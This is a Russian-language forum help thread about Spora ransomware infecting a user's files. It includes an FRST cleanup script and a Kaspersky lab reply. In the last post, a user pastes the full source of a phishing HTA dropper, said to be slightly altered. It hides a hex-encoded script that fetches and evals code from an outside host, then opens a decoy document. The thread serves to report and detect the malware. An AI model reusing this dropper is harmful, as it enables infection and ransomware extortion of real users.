Перейти к содержанию

Вирус Spora поменял кодировку документов

bread89
 Share

Рекомендуемые сообщения

bread89 Новичок

bread89

Опубликовано
Опубликовано (изменено)

Добрый вечер, не знаю что и делать, все файлы офиса битые(. Вирус попал при открытии почты, картинки тоже не открываются, создались файлы *.lnk на всех дисках

Изменено пользователем bread89
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Здравствуйте,
 

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
CloseProcesses:
2017-01-10 14:15 - 2017-01-10 14:15 - 00212512 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
2017-01-10 14:15 - 2017-01-10 14:15 - 00009094 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
2017-01-10 14:10 - 2017-01-10 14:10 - 00001088 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
Folder: C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:09 - 2017-01-10 14:15 - 00364184 _____ C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:09 - 2017-01-10 14:15 - 0364184 _____ () C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:15 - 2017-01-10 14:15 - 0009094 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
2017-01-10 14:10 - 2017-01-10 14:10 - 0001088 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
2017-01-10 14:15 - 2017-01-10 14:15 - 0212512 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
Zip: C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe;C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe;C:\Users\KompMaster\AppData\Local\Temp\un7.exe;C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe;C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe
C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe
C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
C:\Users\KompMaster\AppData\Local\Temp\SkypeSetup.exe
C:\Users\KompMaster\AppData\Local\Temp\un7.exe
C:\Users\KompMaster\AppData\Local\Temp\YandexPackSetup.exe
C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe
Reboot:
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.


Файл <дата>_<время>.zip (где <дата> - текущая дата <время> - текущее время) с рабочего стола отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)

Ссылка на комментарий
Поделиться на другие сайты
bread89 Новичок

bread89

Опубликовано
  • Автор
Опубликовано (изменено)

Почистил сегодня комп GDATA_ANTIVIRUS распоздал вирус Spora и почистил весь комп, но проблема с ворд файлами и фото осталось, файлы перекодированны

ответили на письмо:

письмо:

[KLAN-5642658061]

Спасибо, что отправили файл на исследование в Антивирусную Лабораторию.

Антивирус Касперского проверил файлы.

Вредоносные программы не найдены в файлах:
23caa910-d6d6-3608-4619-92ae79505bfc.exe
PidGenX.dll
un7.exe
{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe

Мы исследуем эти файлы. Если результат исследования будет отличаться, мы сообщим вам по электронной почте в течение пяти дней.

Это сообщение сформировано автоматической системой приёма писем. Пожалуйста не отвечайте на него.

Антивирусная Лаборатория, Kaspersky Lab HQ

"Ленинградское шоссе 39A/3, Москва, 125212, Russia
Телефон/Факс: + 7 (495) 797 8700 
http://www.kaspersky.com http://www.viruslist.com"

 

Fixlog.txt

Изменено пользователем bread89
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Если есть лицензии на продукты ЛК, то пробуйте создать запрос https://forum.kasperskyclub.ru/index.php?showtopic=48525

P.S. Не удаляйте каталог C:\FRST пока не решите вопрос с расшифровкой.

Ссылка на комментарий
Поделиться на другие сайты
  • 1 month later...
TRuF Новичок

TRuF

Опубликовано
Опубликовано

Пришел архив с социально адаптированным названием Акт сверки_ноябрь2016_перерасчет (для сверки).rar весом 1 448 байт

Внутри не менее веселое название Скан-копия от 13.02.2017. CPOЧHO для пpoверки. ПРОВЕРЕНО директором компании_Для печати_.0b87832.hta весом 2613 байт.

Несколько символом в бинарнике изменил чтобы не сочли за распространителя вредоносного кода.

 

<hta:application windowstate='minimize'/>
<script type="text/jscript" language="JScript">
/// 231b6cab8f093d6b8fcf224a9470921f
var g=2+3
if (g=5)
/// f3bde637038f2de9838e4700b8cddf5c
{try{ty=new ActiveXObject("Excel.Application")}catch(e){};};
else
/// a59c6d58d3dc8429d7dcf89dceb88789
Nothing();
/// e2502d119f7a98d7fd47fe3a5d2c332f
/// b59627e8e9a3f95063b80ebd6508481e
/// b455ff4cfe958f396abcfacf36533c82
var hol=8+15;
/// a7bab053a61d99715955e4f220f05e5f
hol.toString();
f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");z=f.getSpecialFolder(2)+'\\'+f.getBaseName(f.getTempName())+'.wsf';var d=f.getBaseName(/filename="(.+)"/);var r=x.createElement('bill'),y=0;r.text="964223E0D0A3C6F626A6563742069643D227479222070726F6769643D226D73786D6C322E786D6C6874747022202F3E0D0A3C6F626A6563742069643D2271222070726F6769643D2241444F44422E436F6E6E656374696F6E22202F3E0D0A3C6F626A6563742069643D22686F222070726F6769643D225368656C6C2E4170706C69636174696F6E22202F3E200D0A3C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A575363726970742E536C6565702832303030290D0A766172206A6F3D322B330D0A76617220676C6F3D380D0A69662028676C6F3D35290D0A7B6A69703D6E657720416374697665584F626A656374282241444F44422E5265636F726473657422297D3B0D0A656C73650D0A7B6E657720416374697665584F626A6563742822536372697074696E672E46696C6553797374656D22297D3B0D0A7661722075203D2074793B0D0A752E6F70656E2822474554222C22687474703A2F2F7374726F796D6F6C6C2E636F6D2F686F6F64222C30293B0D0A752E73656E6428293B0D0A6576616C28752E526573706F6E736554657874293B0D0A203C2F7363726970743E0D0A203C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A20575363726970742E536C6565702832303030290D0A2076617220686F6C3D382B31353B0D0A20686F6C2E746F537472696E6728293B0D0A0D0A20203C2F7363726970743E0D0".replace(/^\s*(.+\s+){4}/,''),r.dataType='bin.hex';s.type=1,s.open(),s.write(r.nodeTypedValue),s.saveToFile(z),s.close();a.ShellExecute(z)
/// a1325c49cbe093e8c4c0eff6f6e1f54c
 try{f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");var m = new ActiveXObject("Word.Application");m.Caption =("Test");m.Visible =("True");var j = m.Documents.Add();var l = m.Selection;l.TypeText("");}catch(e){};try{l.TypeParagraph();j.SaveAs("bill(14.02.17).doc");}catch(e){};
window.close()
 </script>

 

 

На какой email отправить оригинал?

и когда реально ждать обновления защиты?

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем
×
×
  • Создать...